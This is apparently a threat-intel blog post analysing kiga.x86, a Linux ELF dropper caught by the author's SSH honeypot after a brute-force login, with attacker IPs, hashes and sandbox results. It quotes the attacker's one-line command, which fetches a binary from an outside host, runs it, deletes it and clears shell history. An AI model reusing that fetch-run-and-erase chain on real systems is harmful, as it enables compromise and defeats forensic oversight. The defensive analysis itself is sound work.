ELF Analysis- kiga.x86
In addition to my weekly threat intel report, I’ll highlight a file/executable/exploit attempt seen in the last week. I’ll do some basic file analysis to better understand what it is, and what it’s trying to accomplish. Hopefully this can provide contextual data for those doing their own research.
This week we’re looking at kiga.x86. Using various username and password combinations, an IP address from Russia attempted to login to my ssh honeypot 640 times. I allow the username root with any password, which they used to successfully authenticate 15 times. When logged in, the bot issued one command, which fetched their payload(kiga.x86), made sure it was executable, ran it, removed the payload from the machine and cleared the cli history. Kiga.x86 is a linux executable, that doesn’t give us much info about it’s behavior at first glance. Based on execution analysis, it appears to remove and execute programs in the /tmp folder. It could be used to clear other droppers and make sure it’s payloads are being executed.
Attacker Commands:
wget http://185[dot]172[dot]110[dot]214/AB4g5/kiga[dot]x86; chmod 777 *; ./kiga[dot]x86 Roots;rm -rf kiga[dot]x86; history -c
Filename: kiga.x86
Timestamp: 2020-06-14 05:11PM PST
Initiating Source IP: 93.157.62.102
Downloaded from: http://185[dot]172[dot]110[dot]214/AB4g5/kiga.x86
SHA256: c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
Virus Total Link: https://www.virustotal.com/gui/file/c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1/detection
File Contents:
file kiga.x86
kiga.x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Initiating Source IP Analysis:
| Analysis Date | 2020-06-14 22:12:08 |
| Elapsed Time | 3 seconds |
| Blacklist Status | BLACKLISTED 28/114 |
| IP Address | 93.157.62.102 Find Sites | IP Whois |
| Reverse DNS | mta23.dealzania.site |
| ASN | AS43350 |
| ASN Owner | NForce Entertainment B.V. |
| ISP | NFOrce Entertainment B.V. |
| Continent | Europe |
| Country Code | |
| Latitude / Longitude | 55.7386 / 37.6068 Google Map |
| City | Unknown |
| Region | Unknown |
Download URL analysis:
| Analysis Date | 2020-06-14 22:13:10 |
| Elapsed Time | 16 seconds |
| Blacklist Status | BLACKLISTED 4/114 |
| IP Address | 185.172.110.214 Find Sites | IP Whois |
| Reverse DNS | Unknown |
| ASN | AS206898 |
| ASN Owner | Server Hosting Pty Ltd |
| ISP | Server Hosting Pty Ltd |
| Continent | Europe |
| Country Code | |
| Latitude / Longitude | 52.3824 / 4.8995 Google Map |
| City | Unknown |
| Region | Unknown |
Virus Total Stats:
As of 2020-06-14, 31/60 engines detect this file as malicious
Additional properties:
MD5 7b65dec7862e5fbde95fbeb33e10468b
SHA-1 ec2556fd8052d48376da56ce5abdb22ce12b557d
SHA-256 c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1
Vhash 7bb8336eb02c878841bb63e512d6698e
SSDEEP 1536:pvfI8quwTDx27izeXbcziMnEfzwTOEVz3kZIIxYaZH5H5b:1zquSDx22zeXbqEfz+OE5UKI2WHxh
File type ELF
Magic ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
File size 60.98 KB (62448 bytes)
ELF Info:
Header
Class ELF32
Data 2’s complement, little endian
Header Version 1 (current)
OS ABI UNIX – System V
Object File Type EXEC (Executable file)
Required Architecture Intel 80386
Object File Version 0x1
Program Headers 3
Section Headers 10
Windows Defender:
Example actions:
Processes Terminated
When executing the file being studied, the following processes were terminated.
- /tmp/EB93A6/996E.elf
- /lib/systemd/systemd-udevd –daemon
Tancent Analysis:
| SHA256: | c51dde1933e3c8dee0b1236c7269ce08661f0ef59b6b011e61f26bb7b5706ae1 |
| File type: | ELF32 |
Process
| Behaviour: | Execute a file |
| Detail info: | execve: /tmp/bin/****.elf |
| Behaviour: | Process exit |
| Detail info: | procexit status=256 procexit status=136 procexit status=0 |
Network
| Behaviour: | connect |
| Detail info: | connect: 192.168.0.**:60869->8.8.8.8:domain |
| Behaviour: | socket |
| Detail info: | socket: domain=2(AF_INET) type=2 proto=0 socket: domain=2(AF_INET) type=1 proto=0 |